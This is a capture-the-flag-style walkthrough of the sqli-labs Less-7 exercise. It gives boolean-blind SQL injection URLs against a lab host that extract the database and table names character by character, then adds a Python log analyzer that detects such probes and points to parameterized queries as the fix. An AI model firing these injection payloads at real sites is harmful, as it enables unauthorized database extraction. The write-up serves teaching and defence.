After opening the page, we find that it displays a message about outfile. I'm sorry, I can't make sense of it, so I simply append a ' and find that the page reports an error.
Later, viewing the source code, I learned that the parameter is wrapped in two brackets.
We can construct our payload, and first query the length of the current database name. With >=8 the page is correct and with >=9 it reports an error, so we can see that the database name length is 8:
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and length(database())>=8--+
To determine the database name, we use the following function:
substr(database(),1,1) takes the value of database() starting from position 1 and returns only one character at a time.
Determine the database name character by character:
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr(database(),1,1)='s'--+ s
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr(database(),2,1)='e'--+ e
I won't continue writing this out here; having done so many of the earlier exercises, we already know the database name is security.
Look up the table name: in the same way, we already know that the users table is the fourth table, so we construct the payload:
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u'--+
The field contents that follow will not be repeated here.
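Seen from the server side, the length and substr requests above leave a recognizable trail in the access log. The following is an added example, not part of the original write-up: it decodes request targets and counts these boolean-blind probes per client. The log tuples, client addresses, the function name summarize and the min_probes threshold are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Comparison on a length() call, e.g. length(database())>=8
LENGTH_PROBE = re.compile(r"\blength\s*\(.+?\)\s*(?:>=|<=|=|>|<)\s*\d+", re.I)
# Single-character comparison, e.g. substr(database(),2,1)='e'
CHAR_PROBE = re.compile(r"\bsubstr(?:ing)?\s*\(.+,\s*(\d+)\s*,\s*1\s*\)\s*=\s*'.'", re.I)

# Constructed sample: (client address, request target) pairs, not real traffic.
BASE = "/sqli-labs-master/Less-7/?id="
INJ = BASE + "1%27))%20and%20"
SAMPLE_LOG = [
    ("10.0.0.5", BASE + "1"),
    ("10.0.0.9", INJ + "length(database())%3E=8--+"),
    ("10.0.0.9", INJ + "length(database())%3E=9--+"),
    ("10.0.0.9", INJ + "substr(database(),1,1)=%27s%27--+"),
    ("10.0.0.9", INJ + "substr(database(),2,1)=%27e%27--+"),
    ("10.0.0.9", INJ + "substr((select%20table_name%20from%20information_schema.tables"
                       "%20where%20table_schema=%27security%27%20limit%203,1),1,1)=%27u%27--+"),
    ("10.0.0.5", BASE + "2"),
]

def summarize(log, min_probes=3):
    """Return per-client probe counts for clients with at least min_probes hits.

    min_probes is an assumed threshold; tune it against real traffic.
    """
    stats = defaultdict(lambda: {"length": 0, "char": 0, "positions": set(), "schema": False})
    for client, target in log:
        query = unquote_plus(urlsplit(target).query)  # decode %27, %20 and '+'
        entry = stats[client]
        if LENGTH_PROBE.search(query):
            entry["length"] += 1
        match = CHAR_PROBE.search(query)
        if match:
            entry["char"] += 1
            entry["positions"].add(int(match.group(1)))  # character offset being tested
        if "information_schema" in query.lower():
            entry["schema"] = True  # probing has moved on to table metadata
    flagged = {}
    for client, entry in stats.items():
        if entry["length"] + entry["char"] >= min_probes:
            flagged[client] = {**entry, "positions": sorted(entry["positions"])}
    return flagged

if __name__ == "__main__":
    for client, summary in summarize(SAMPLE_LOG).items():
        print(client, summary)
```

Detection only narrows the window; the underlying fix is to bind id as a query parameter instead of concatenating it into the SQL string.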